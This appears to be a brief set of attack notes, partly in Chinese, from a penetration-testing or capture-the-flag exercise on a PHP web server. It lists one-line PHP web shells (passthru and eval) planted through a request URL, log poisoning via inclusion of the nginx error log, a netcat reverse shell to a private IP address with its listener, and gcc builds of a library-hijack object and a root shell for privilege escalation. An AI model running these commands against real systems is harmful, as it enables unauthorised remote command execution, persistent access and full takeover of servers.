在url中植入一句话木马,可执行外部命令,并显示原始输出<?php passthru($_GET['abc']); ?>
[GET /thankyou.php?<?php eval($_REQUEST[123]); ?> HTTP/1.1]
【GET /thankyou.php?file=/var/log/nginx/error.log HTTP/1.1】
[nc -e /bin/bash 192.168.160.129 1234]
nc -lvvp 123
gcc -fPIC -shared -ldl -o libhax.so libhax.c
gcc -o rootshell rootshell.c
set ff=unix